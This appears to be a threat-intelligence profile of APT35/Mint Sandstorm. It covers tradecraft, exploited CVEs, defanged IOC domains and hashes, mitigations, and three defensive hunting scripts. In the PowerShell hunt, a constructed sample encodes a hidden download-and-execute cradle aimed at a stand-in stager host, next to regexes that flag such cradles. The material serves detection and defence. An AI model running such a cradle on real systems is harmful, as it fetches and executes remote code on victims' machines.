Short title: Iran-aligned social engineering and credential theft specialist with expanding intrusion tooling
APT35, Charming Kitten, Mint Sandstorm, PHOSPHORUS, TA453, IRGC, spear-phishing, credential harvesting, civil society targeting, DIB, universities, Exchange/ManageEngine exploitation
1. Executive Summary
APT35 is a long-running Iran-aligned cyber espionage actor best known for high-touch social engineering, credential harvesting, and targeted spear-phishing against individuals and organisations aligned to Iranian strategic intelligence requirements. Microsoft tracks overlapping activity as Mint Sandstorm (PHOSPHORUS) and assesses links to Iran’s Islamic Revolutionary Guard Corps (IRGC), citing corroboration from multiple security vendors and US government action. (Microsoft)
While many APT35 operations are “low malware” and identity-centric, reporting since 2023–2024 highlights more mature tradecraft in subsets of the ecosystem, including faster adoption of public PoCs for perimeter vulnerabilities and bespoke implants/backdoors in selected intrusions. (Microsoft)
Victimology consistently includes civil society, academia, journalists, policy and Middle East analysts, as well as government and defence-adjacent targets in the UK, US, Israel, and Europe. (Microsoft)
2. Contextual Background
2.1 Nature of the threat
APT35 is commonly described as an intelligence collection actor, with recurring emphasis on:
- Spear-phishing and credential harvesting (often via spoofed login pages and rapport-building) (NCSC)
- Targeted social engineering against personal webmail to bypass enterprise controls (NCSC)
- Opportunistic and targeted exploitation of internet-facing applications, including rapid weaponisation of N-day vulnerabilities by mature subgroups Microsoft attributes to Mint Sandstorm (Microsoft)
Where relevant to APT35-linked intrusions, publicly reported vulnerabilities include (all three are unauthenticated remote code execution flaws reachable over the network in internet-facing software):
- CVE-2022-47966 (Zoho ManageEngine, multiple on-prem products; RCE via the SAML SSO endpoint where SAML is or was previously enabled)
  - Vendor advisory: ManageEngine advisory for CVE-2022-47966 (manageengine.com)
  - NVD (nvd.nist.gov)
  - CISA notes exploitation of CVE-2022-47966 by multiple nation-state actors as an initial access vector. (cisa.gov)
- CVE-2022-47986 (IBM Aspera Faspex; RCE via YAML deserialisation)
  - Vendor bulletin: IBM Security Bulletin including CVE-2022-47986 (IBM)
  - NVD (nvd.nist.gov)
  - Microsoft reports Mint Sandstorm exploitation of CVE-2022-47986 within days of PoC publication. (Microsoft)
- CVE-2021-44228 (Log4Shell; JNDI lookup RCE in Apache Log4j 2)
  - Government guidance (UK): NCSC alert on Log4j / CVE-2021-44228 (NCSC)
  - NVD (nvd.nist.gov)
  - Microsoft reports continued use of older vulnerabilities including Log4Shell by the Mint Sandstorm subgroup. (Microsoft)
2.2 Threat-actor attribution
- Aliases / tracking: APT35 is widely associated with “Charming Kitten”, “PHOSPHORUS/Mint Sandstorm” (Microsoft), and “TA453” (Proofpoint). MITRE ATT&CK tracks the cluster as G0059 (primary name “Magic Hound”) with associated names including TA453, Phosphorus, Newscaster, APT35, and Mint Sandstorm. (attack.mitre.org)
- Attribution to IRGC: Microsoft assesses Mint Sandstorm is associated with an intelligence arm of the IRGC and cites corroboration plus US Treasury action. (Microsoft)
- Confidence: Likely (A2/B2): Multiple credible sources converge on Iran state alignment and IRGC association, but public reporting often describes overlaps between intrusion sets and subgroups rather than a single monolithic unit. (Microsoft)
2.3 Sector and geographic targeting
Commonly observed target sets include:
- Civil society and individuals: dissidents, activists, journalists, academics, policy researchers (including UK-linked targeting) (Microsoft)
- Government and defence-adjacent: defence industrial base, think tanks, government agencies (Microsoft)
- Critical infrastructure interest (subset): Microsoft describes targeting of US critical infrastructure (seaports, energy, transit) by a mature Mint Sandstorm subgroup. (Microsoft)
3. Technical Analysis
3.1 TTPs and tradecraft (with MITRE ATT&CK mapping)
Reconnaissance and rapport-building
- Open-source research on targets and interests: T1593 / T1589 (NCSC)
- Use of fraudulent personas and social accounts: T1585.001 (NCSC)
- Preference for targeting personal webmail, which sits outside enterprise mail filtering and logging: no single ATT&CK technique; behavioural pattern described in the UK NCSC advisory (NCSC)
Initial access
- Spear-phishing links and malicious file-sharing lures: T1566.002 (NCSC)
- Credential harvesting via spoofed login pages and domain lookalikes: T1566.002 + T1583.001 (NCSC)
- Exploitation of public-facing applications (subset): T1190 (Microsoft)
Post-compromise
- Use of stolen credentials for mailbox access: T1078 (NCSC)
- Email theft and persistence via forwarding rules: T1114.002 / T1114.003 (NCSC)
- PowerShell-heavy discovery and automation in intrusions attributed to a mature Mint Sandstorm subgroup: T1059.001 (Microsoft)
- Lateral movement with Impacket tooling (reported by Microsoft): T1021.002 (SMB/Windows Admin Shares) and related remote execution patterns. Microsoft names Impacket explicitly but not the module used; the technique mapping is inferred from Impacket’s common use cases (wmiexec/smbexec-style remote execution over SMB). (Microsoft)
- Scheduled tasks for persistence (reported by Microsoft in one attack chain): T1053.005 (Microsoft)
- AD database theft objective noted by Microsoft (credential access): T1003.003 (Microsoft)
Malware/tooling (selected public reporting)
- Proofpoint reports TA453 malware frameworks including BlackSmith delivering a PowerShell trojan AnvilEcho, and describes staging via ZIP/LNK delivery and DLL components. (Proofpoint)
- Microsoft reports a custom backdoor named MediaPl in a 2023–2024 Mint Sandstorm campaign targeting universities and research organisations. (Microsoft)
3.2 Exploitation status and PoC considerations
- Social engineering remains active: the UK NCSC advisory describes spear-phishing continuing through 2022 and notes that this tradecraft continues to succeed against its targets. (NCSC)
- N-day exploitation acceleration: Microsoft reports faster adoption of public PoCs beginning in early 2023 for a mature subgroup, including same-day use of CVE-2022-47966 PoC and rapid use of CVE-2022-47986. (Microsoft)
- Broader ecosystem exploitation signals: CISA documents that CVE-2022-47966 exploitation has been used by multiple nation-state actors for initial access, underscoring the likelihood of opportunistic overlap and copycat activity around widely weaponised CVEs. (cisa.gov)
4. Impact Assessment
4.1 Severity and scope
APT35’s impact is often driven less by single “big” malware events and more by:
- Account compromise (personal and corporate), enabling long-dwell espionage, contact harvesting, and follow-on phishing. (NCSC)
- Sensitive information theft from mailboxes and collaboration platforms, including policy, research, diplomatic, and activist data. (NCSC)
- Escalation pathways where intrusion subgroups pivot from perimeter exploits to lateral movement and directory credential access. (Microsoft)
Where APT35-linked subsets exploit critical vulnerabilities, potential impact aligns with the underlying CVSS; all three CVEs below are rated Critical on NVD and give unauthenticated remote code execution on the exposed host:
- CVE-2022-47966: see NVD (nvd.nist.gov)
- CVE-2022-47986: see NVD (nvd.nist.gov)
- CVE-2021-44228: see NVD (nvd.nist.gov)
4.2 Victim profile
Observed victim profiles include:
- Individuals: journalists, activists, academics, researchers, and prominent community figures (Proofpoint examples include medical researchers and a religious figure). (Proofpoint)
- Organisations: universities/research orgs across Belgium, France, UK, US and Israel (Microsoft), plus DIB/think tanks/government services (Microsoft profile). (Microsoft)
5. Indicators of Compromise (IOCs)
5.1 IOC table (publicly reported)
Note: These IOCs are taken directly from publicly published vendor reporting and are not exhaustive. Validate context before blocking in production.
| Type | Value | Context/Notes | Source |
|---|---|---|---|
| Domain | 1drv[.]casa | Credential harvesting domain used in “BadBlood” campaign | Proofpoint: “BadBlood” campaign write-up (Proofpoint) |
| Domain | 1drv[.]online / 1drv[.]live / 1drv[.]icu / 1drv[.]surf / 1drv[.]xyz / 1drv[.]cyou | Additional reported TA453 phishing domains | Proofpoint: “BadBlood” IOC table (Proofpoint) |
| URL | 1drv[.]casa/s/AFGHJKFJelMtfZXSXSGkdsjh1 | Example credential harvesting URL (variants likely) | Proofpoint: “BadBlood” IOC table (Proofpoint) |
| Domain | understandingthewar[.]org | Lure domain used in 2024 podcast-themed operation | Proofpoint: “Best Laid Plans” IOC list (Proofpoint) |
| Domain | d75[.]site | Storage/stager domain used to download components | Proofpoint: “Best Laid Plans” IOC list (Proofpoint) |
| Domain | deepspaceocean[.]info | Reported C2 | Proofpoint: “Best Laid Plans” IOC list (Proofpoint) |
| SHA-256 | 5dca88f08b586a51677ff6d900234a1568f4474bbbfef258d59d73ca4532dcaf | .LNK file | Proofpoint: “Best Laid Plans” IOC list (Proofpoint) |
| SHA-256 | 5aee738121093866404827e1db43c8e1a7882291afedfe90314ec90b198afb36 | Podcast Plan 2024.zip | Proofpoint: “Best Laid Plans” IOC list (Proofpoint) |
| SHA-256 | 8a47fd166059e7e3c0c1740ea8997205f9e12fc87b1ffe064d0ed4b0bf7c2ce1 | qemus (AnvilEcho) | Proofpoint: “Best Laid Plans” IOC list (Proofpoint) |
| File path | C:\Users\Public\Public Library | Directory created during BlackSmith installation chain | Proofpoint: infection chain details (Proofpoint) |
5.2 Detection guidance
Network and DNS
- Alert on DNS/TLS SNI hits for the domains in the IOC table (with careful false-positive handling, as some patterns mimic legitimate brands). Proofpoint references Emerging Threats signature IDs for TA453 domain detections in its 2024 reporting. (Proofpoint)
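The following is an added example (not code from the page, Proofpoint or Emerging Threats) showing one way to run the DNS hunt described above: it refangs the defanged domains from the IOC table, matches them (and their subdomains) against query logs, and separately flags OneDrive-style lookalikes that carry a “1drv”/“onedrive” label outside Microsoft’s own domains. The log lines are constructed in a simplified BIND query-log shape; the lookalike heuristic and the LEGIT_BRAND_DOMAINS allowlist are this example’s own assumptions and will need tuning per tenant.

```python
"""Hunt DNS query logs for the phishing/C2 domains on this page and for
OneDrive-style lookalikes (a "1drv"/"onedrive" label outside Microsoft's
own domains).

Added example, not code from the page, Proofpoint or Emerging Threats. The IOC
values are the defanged domains from the IOC table above; the log lines are
constructed (simplified BIND query-log shape), and the lookalike heuristic and
LEGIT_BRAND_DOMAINS allowlist are this example's own assumptions.
"""
import re
from typing import Dict, List, Optional

IOC_DOMAINS_DEFANGED = [
    "1drv[.]casa", "1drv[.]online", "1drv[.]live", "1drv[.]icu", "1drv[.]surf",
    "1drv[.]xyz", "1drv[.]cyou", "understandingthewar[.]org", "d75[.]site",
    "deepspaceocean[.]info",
]
# Registrable domains that legitimately carry a OneDrive-style label (assumption; extend per tenant).
LEGIT_BRAND_DOMAINS = {"1drv.ms", "onedrive.com", "live.com", "microsoft.com", "sharepoint.com"}
BRAND_LABELS = ("1drv", "onedrive")

# Simplified BIND-style query log: "... client 10.0.0.5#53122: query: host IN A +"
QUERY_RE = re.compile(r"client (?P<src>[\d.]+)#\d+.*?query: (?P<qname>\S+) IN (?P<qtype>\w+)")


def refang(indicator: str) -> str:
    """Undo common defanging so table values can be compared with live telemetry."""
    return (indicator.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
            .replace("hxxp", "http").strip().lower().rstrip("."))


IOC_DOMAINS = {refang(d) for d in IOC_DOMAINS_DEFANGED}


def registrable_domain(fqdn: str) -> str:
    """Naive eTLD+1 (last two labels). Use the public suffix list in production;
    this mishandles co.uk-style suffixes, which is acceptable for the demo."""
    labels = fqdn.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify(qname: str) -> Optional[str]:
    """'ioc' for a known-bad domain or a subdomain of one, 'lookalike' for a
    brand-styled name outside the allowlist, None otherwise."""
    q = qname.lower().rstrip(".")
    reg = registrable_domain(q)
    if q in IOC_DOMAINS or reg in IOC_DOMAINS:
        return "ioc"
    if reg in LEGIT_BRAND_DOMAINS:
        return None
    if any(brand in label for label in q.split(".") for brand in BRAND_LABELS):
        return "lookalike"
    return None


def hunt(log_lines) -> List[Dict[str, str]]:
    """Return one hit per query whose name is an IOC or a lookalike."""
    hits = []
    for line in log_lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        verdict = classify(m.group("qname"))
        if verdict:
            hits.append({"src": m.group("src"),
                         "qname": m.group("qname").rstrip("."),
                         "verdict": verdict})
    return hits


SAMPLE_LOG = [  # constructed
    "12-Aug-2024 09:01:10.001 client 10.20.0.14#53122: query: 1drv.casa IN A +",
    "12-Aug-2024 09:01:11.002 client 10.20.0.14#53123: query: onedrive.live.com IN A +",
    "12-Aug-2024 09:01:12.003 client 10.20.0.14#53124: query: cdn.1drv.example IN A +",
    "12-Aug-2024 09:01:13.004 client 10.20.0.21#53125: query: d75.site IN A +",
    "12-Aug-2024 09:01:14.005 client 10.20.0.21#53126: query: 1drv.ms IN A +",
    "12-Aug-2024 09:01:15.006 client 10.20.0.21#53127: query: www.example.org IN A +",
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit)
```

The two verdicts deserve different handling: an `ioc` hit is a block-and-investigate event, whereas a `lookalike` hit is a triage lead that must be checked against the allowlist first, because legitimate brand-named hosts do exist and the heuristic is deliberately broad.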
Email security
- Prioritise detections for:
  - Rapport-building threads from newly created or unverified external senders that only introduce a link after several benign exchanges (conference invite, podcast or journalist-interview lures described in public reporting). (NCSC, Proofpoint)
  - Links to file-sharing or login pages hosted on lookalike domains (for example the 1drv[.]* domains in the IOC table) rather than on the genuine service. (Proofpoint)
  - ZIP attachments or file-sharing links that deliver LNK files, the staging used in the BlackSmith/AnvilEcho chain. (Proofpoint)
Endpoint and identity
- Hunt for suspicious LNK → PowerShell execution chains: T1059.001 (Proofpoint)
- Monitor mailbox rule creation (forwarding rules) and anomalous logins: T1114.003 / T1078 (NCSC)
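The forwarding-rule detection above (and the mailbox triage step in section 6.1) can be run directly over an audit export. The following is an added example, not code from the page, NCSC or Microsoft: it reviews Microsoft 365 Unified Audit Log records for inbox rules or mailbox settings that forward, redirect or attach-forward mail to an address outside the organisation, and raises the severity when the rule also deletes or marks the original as read (the silent-exfiltration pattern). The records are constructed; their shape (Operation, UserId, ClientIP, CreationTime and a Parameters list of Name/Value pairs) follows Exchange Online admin-audit events as they appear in a Unified Audit Log export, but confirm field names against your own export. INTERNAL_DOMAINS is an assumption.

```python
"""Review Microsoft 365 Unified Audit Log records for inbox rules that forward
or redirect mail outside the organisation (ATT&CK T1114.003).

Added example, not code from the page or from NCSC/Microsoft. The records are
constructed; their shape follows Exchange Online admin-audit events in a
Unified Audit Log export, but confirm field names against your own export.
INTERNAL_DOMAINS is an assumption.
"""
import json
import re
from typing import Iterable, List, Set

INTERNAL_DOMAINS: Set[str] = {"example.com", "corp.example.com"}  # assumption: your accepted domains

# Operations that can install a forward, and the parameters that carry the target.
RULE_OPERATIONS = {"New-InboxRule", "Set-InboxRule", "Set-Mailbox"}
FORWARD_PARAMS = {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo",
                  "ForwardingSmtpAddress", "ForwardingAddress"}
# Values look like 'Jane [SMTP:jane@host]', 'smtp:jane@host' or 'a@x;b@y'; pull bare addresses.
EMAIL_RE = re.compile(r"[\w.+-]+@[\w.-]+\.[A-Za-z]{2,}")


def parse_audit_lines(lines: Iterable[str]) -> List[dict]:
    """Parse one JSON record per line, skipping blank and malformed lines."""
    records = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            records.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return records


def external_recipients(value: str, internal: Set[str]) -> List[str]:
    """Addresses in a parameter value whose domain is not one of ours."""
    addrs = {a.lower() for a in EMAIL_RE.findall(value)}
    return sorted(a for a in addrs if a.rsplit("@", 1)[1] not in internal)


def review_records(records: Iterable[dict], internal: Set[str] = INTERNAL_DOMAINS) -> List[dict]:
    """Return one finding per rule/mailbox change that sends mail to an external address."""
    findings = []
    for rec in records:
        op = rec.get("Operation", "")
        if op not in RULE_OPERATIONS:
            continue
        params = {p.get("Name"): str(p.get("Value", "")) for p in rec.get("Parameters", [])}
        external = sorted({a for name in FORWARD_PARAMS if name in params
                           for a in external_recipients(params[name], internal)})
        if not external:
            continue
        # A forward that also deletes or hides the original is the classic silent-exfil setup.
        hides = any(params.get(k, "").lower() == "true" for k in ("DeleteMessage", "MarkAsRead"))
        findings.append({
            "time": rec.get("CreationTime"),
            "mailbox": rec.get("UserId"),
            "client_ip": rec.get("ClientIP"),
            "operation": op,
            "rule_name": params.get("Name"),
            "external": external,
            "severity": "critical" if hides else "high",
        })
    return findings


# Constructed sample export: one JSON object per line.
SAMPLE_AUDIT_LINES = [
    json.dumps({"CreationTime": "2024-08-12T06:14:03", "Operation": "New-InboxRule",
                "UserId": "alice@example.com", "ClientIP": "203.0.113.7",
                "Parameters": [{"Name": "Name", "Value": "."},
                               {"Name": "ForwardTo", "Value": "collect [SMTP:collect@archive-mail.example.net]"},
                               {"Name": "DeleteMessage", "Value": "True"}]}),
    json.dumps({"CreationTime": "2024-08-12T08:02:41", "Operation": "Set-InboxRule",
                "UserId": "bob@example.com", "ClientIP": "10.20.0.14",
                "Parameters": [{"Name": "Name", "Value": "Helpdesk copies"},
                               {"Name": "ForwardTo", "Value": "it-helpdesk@corp.example.com"}]}),
    json.dumps({"CreationTime": "2024-08-12T08:30:00", "Operation": "New-InboxRule",
                "UserId": "carol@example.com", "ClientIP": "10.20.0.31",
                "Parameters": [{"Name": "Name", "Value": "Newsletters"},
                               {"Name": "MoveToFolder", "Value": "Newsletters"}]}),
    json.dumps({"CreationTime": "2024-08-12T09:11:09", "Operation": "Set-Mailbox",
                "UserId": "dave@example.com", "ClientIP": "198.51.100.23",
                "Parameters": [{"Name": "Identity", "Value": "dave"},
                               {"Name": "ForwardingSmtpAddress", "Value": "smtp:dave.personal@example.org"},
                               {"Name": "DeliverToMailboxAndForward", "Value": "True"}]}),
    json.dumps({"CreationTime": "2024-08-12T09:12:00", "Operation": "MailItemsAccessed",
                "UserId": "dave@example.com", "ClientIP": "198.51.100.23", "Parameters": []}),
]

if __name__ == "__main__":
    for finding in review_records(parse_audit_lines(SAMPLE_AUDIT_LINES)):
        print(finding)
```

Two design points: the check covers Set-Mailbox as well as inbox rules, because a mailbox-level ForwardingSmtpAddress bypasses rule-based detections entirely; and a rule named “.” or similar is a common low-visibility choice, so rule names are carried into the finding for the analyst rather than filtered on.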
6. Incident Response Guidance
6.1 Containment, eradication, recovery
- Contain identity first: force password resets, revoke refresh tokens, and review MFA enrolments for targeted users (APT35 tradecraft heavily favours credential theft). (NCSC)
- Mailbox triage: identify and remove malicious forwarding rules and delegates; review recent OAuth consents and “impossible travel” sign-in patterns. (NCSC)
- Scope lateral movement (where intrusion tradecraft is observed): isolate affected hosts, collect volatile artefacts, and review remote execution traces and scheduled task creation. (Microsoft)
- Block known infrastructure (domains/hashes) from vetted IOC lists and re-scan for related artefacts.
6.2 Forensic artefacts to preserve
- Email headers and full message bodies for suspected rapport-building and link delivery. (NCSC)
- Authentication logs (IdP, O365/Google Workspace), mailbox audit logs, forwarding rule changes. (NCSC)
- Endpoint artefacts: LNK files, ZIP staging, PowerShell operational logs, scheduled tasks, and any DLL drops matching published hashes. (Proofpoint)
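The LNK-to-PowerShell hunt from section 5.2 and the endpoint artefacts listed above can be worked through process-creation telemetry. The following is an added example, not code from the page, Proofpoint or Microsoft: it scores PowerShell launches from constructed Sysmon Event ID 1-style records (Image, CommandLine, ParentImage, User), decodes any `-EncodedCommand` payload (Base64 of UTF-16LE) so that download cradles hidden inside it still match, and treats explorer.exe as the parent a double-clicked .lnk produces. The weights, the threshold and the sample records (including the constructed stager URL) are this example’s own assumptions; the staging-path pattern includes the C:\Users\Public location reported on this page.

```python
"""Hunt process-creation telemetry for LNK-launched PowerShell chains (T1059.001).

Added example; not code from the page, Proofpoint or Microsoft. Records are
constructed in a Sysmon Event ID 1 style (Image, CommandLine, ParentImage,
ParentCommandLine, User). Weights and threshold are this example's own
assumptions; the staging-path pattern includes the C:\\Users\\Public location
reported on this page.
"""
import base64
import re
from typing import Dict, List, Optional

PS_IMAGES = ("\\powershell.exe", "\\pwsh.exe")
LNK_LAUNCHERS = ("\\explorer.exe",)  # a user double-clicking a .lnk yields explorer.exe as parent

# Base64 payload after -e / -enc / -EncodedCommand; PowerShell expects UTF-16LE inside.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")

# (regex, weight, label). Applied to the command line plus any decoded payload.
PATTERNS = [
    (ENC_RE, 3, "encoded command"),
    (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 2, "hidden window"),
    (re.compile(r"(?i)-nop(?:rofile)?\b"), 1, "no profile"),
    (re.compile(r"(?i)\b(?:iex|invoke-expression)\b"), 2, "invoke-expression"),
    (re.compile(r"(?i)(?:net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer)"),
     2, "download cradle"),
    (re.compile(r"(?i)\\users\\public\\|\\appdata\\local\\temp\\|\.lnk\b|\.zip\b"), 1, "staging path"),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: Dict[str, str]) -> Dict:
    """Score one process-creation event; non-PowerShell images score 0."""
    image = ev.get("Image", "").lower()
    if not image.endswith(PS_IMAGES):
        return {"score": 0, "reasons": [], "decoded": None}
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = cmd + ("\n" + decoded if decoded else "")
    score, reasons = 0, []
    if ev.get("ParentImage", "").lower().endswith(LNK_LAUNCHERS):
        score += 2
        reasons.append("launched from explorer.exe (LNK/double-click)")
    for rx, weight, label in PATTERNS:
        if rx.search(text):
            score += weight
            reasons.append(label)
    return {"score": score, "reasons": reasons, "decoded": decoded}


def hunt(events: List[Dict[str, str]], threshold: int = 5) -> List[Dict]:
    """Return events at or above the threshold, with the reasons and decoded payload."""
    results = []
    for ev in events:
        s = score_event(ev)
        if s["score"] >= threshold:
            results.append({"user": ev.get("User"), "image": ev.get("Image"), **s})
    return results


# Constructed sample: the first event mimics a hidden, encoded download cradle.
ENCODED_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://stager.example.net/qemus')"
_ENC = base64.b64encode(ENCODED_PLAINTEXT.encode("utf-16-le")).decode()
PS_PATH = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

SAMPLE_EVENTS = [
    {"User": "CORP\\alice", "Image": PS_PATH,
     "CommandLine": f"powershell.exe -w hidden -nop -enc {_ENC}",
     "ParentImage": "C:\\Windows\\explorer.exe", "ParentCommandLine": "C:\\Windows\\Explorer.EXE"},
    {"User": "NT AUTHORITY\\SYSTEM", "Image": PS_PATH,
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\ProgramData\\Vendor\\inventory.ps1",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "ParentCommandLine": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"},
    {"User": "CORP\\bob", "Image": PS_PATH,
     "CommandLine": f"\"{PS_PATH}\"",
     "ParentImage": "C:\\Windows\\explorer.exe", "ParentCommandLine": "C:\\Windows\\Explorer.EXE"},
    {"User": "CORP\\bob", "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c dir",
     "ParentImage": "C:\\Windows\\explorer.exe", "ParentCommandLine": "C:\\Windows\\Explorer.EXE"},
]

if __name__ == "__main__":
    for r in hunt(SAMPLE_EVENTS):
        print(r)
```

Scoring rather than a single-pattern match matters here: an interactive PowerShell window opened from explorer.exe scores low on its own, while the encoded, hidden, profile-less cradle scores well above the threshold even though none of the cradle keywords appear in the raw command line.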
6.3 Lessons learned
- Reduce reliance on user judgement: improve phishing-resistant MFA and implement stronger identity governance for high-risk individuals and executives.
7. Threat Intelligence Contextualisation
7.1 Similar incident patterns
APT35’s approach strongly resembles other “human-targeted” espionage clusters where patient social engineering is the primary access vector, with selective malware use when credential access alone is insufficient (as reflected in UK NCSC spear-phishing reporting and Proofpoint’s TA453 campaigns). (NCSC)
7.2 ATT&CK mapping table (observed)
| Tactic | Technique ID | Technique Name | Observed behaviour |
|---|---|---|---|
| Reconnaissance | T1593 | Search Open Websites/Domains | OSINT research on targets and hooks (NCSC) |
| Reconnaissance | T1589 | Gather Victim Identity Information | Profiling victims via open sources (NCSC) |
| Resource Development | T1585.001 | Establish Accounts: Social Media Accounts | Fake personas for engagement (NCSC) |
| Resource Development | T1583.001 | Acquire Infrastructure: Domains | Lookalike domains and phishing infra (NCSC) |
| Initial Access | T1566.002 | Phishing: Spearphishing Link | Link delivery after rapport-building (NCSC) |
| Initial Access | T1190 | Exploit Public-Facing Application | N-day exploitation by mature subgroup (Microsoft) |
| Initial Access | T1078 | Valid Accounts | Use of stolen credentials for access (NCSC) |
| Collection | T1114.002 | Remote Email Collection | Inbox access and theft (NCSC) |
| Collection/Persistence | T1114.003 | Email Forwarding Rule | Forwarding rules for ongoing visibility (NCSC) |
| Execution | T1059.001 | PowerShell | PowerShell-heavy chains and tooling (Microsoft) |
| Persistence | T1053.005 | Scheduled Task | Scheduled tasks in Microsoft-described chain (Microsoft) |
| Credential Access | T1003.003 | OS Credential Dumping: NTDS | AD database theft objective described by Microsoft (Microsoft) |
8. Mitigation Recommendations
8.1 Hardening and best practices
- Enforce phishing-resistant MFA (FIDO2/WebAuthn) for high-risk users; reduce reliance on SMS/OTP where feasible.
- Implement conditional access rules (device compliance, geo-velocity, risky sign-in blocks) and monitor for MFA fatigue patterns.
- Disable or tightly control auto-forwarding to external domains and alert on forwarding rule creation. (NCSC)
- Improve executive protection: pre-emptive training focused on rapport-building approaches and “conference invite / podcast / journalist” lures described in public reporting. (NCSC)
8.2 Patch management advice (risk-driven)
Prioritise internet-facing assets and CVEs with public PoCs, consistent with Microsoft’s reporting on rapid PoC adoption: (Microsoft)
- Patch Zoho ManageEngine per ManageEngine advisory for CVE-2022-47966 and track NVD. (manageengine.com)
- Patch IBM Aspera Faspex per IBM bulletin including CVE-2022-47986 and NVD. (IBM)
- Ensure Log4j exposure is eliminated per NCSC Log4j guidance and NVD. (NCSC)
9. Historical Context & Related Vulnerabilities
- UK NCSC situates TA453 activity within broader persistent spear-phishing campaigns, highlighting long-running success rather than one-off exploitation events. (NCSC)
- Microsoft describes evolution in at least one Mint Sandstorm subgroup from slower adoption of exploits to rapid PoC weaponisation and more complex post-exploitation playbooks. (Microsoft)
10. Future Outlook
APT35-aligned activity is likely to continue trending toward:
- More convincing, higher-trust social engineering (multi-step engagement, use of legitimate platforms, and spoofed organisations) as documented in 2024 Proofpoint reporting. (Proofpoint)
- Faster “blast radius” from newly disclosed edge CVEs where PoCs are published, consistent with Microsoft’s 2023 observations. (Microsoft)
- Selective malware deployment (PowerShell-first and modular toolsets) against hardened targets where credentials alone do not meet operational objectives. (Proofpoint)
11. Further Reading
Government and national CERT guidance
- UK NCSC advisory on SEABORGIUM and TA453 spear-phishing (NCSC)
- US Treasury sanctions statement referencing “APT 35 / Charming Kitten / Phosphorus” (U.S. Department of the Treasury)
Vendor and CTI reporting
- Microsoft: Mint Sandstorm actor overview (Microsoft)
- Microsoft: Mint Sandstorm tradecraft and rapid PoC adoption (Apr 2023) (Microsoft)
- Microsoft: 2023–2024 university/research targeting and MediaPl backdoor (Microsoft)
- Proofpoint: “BadBlood” TA453 credential phishing campaign (Proofpoint)
- Proofpoint: “Best Laid Plans” TA453 BlackSmith/AnvilEcho operation + IOCs (Proofpoint)
- MITRE ATT&CK: Group G0059 Magic Hound (TA453 / APT35 / Mint Sandstorm) (attack.mitre.org)
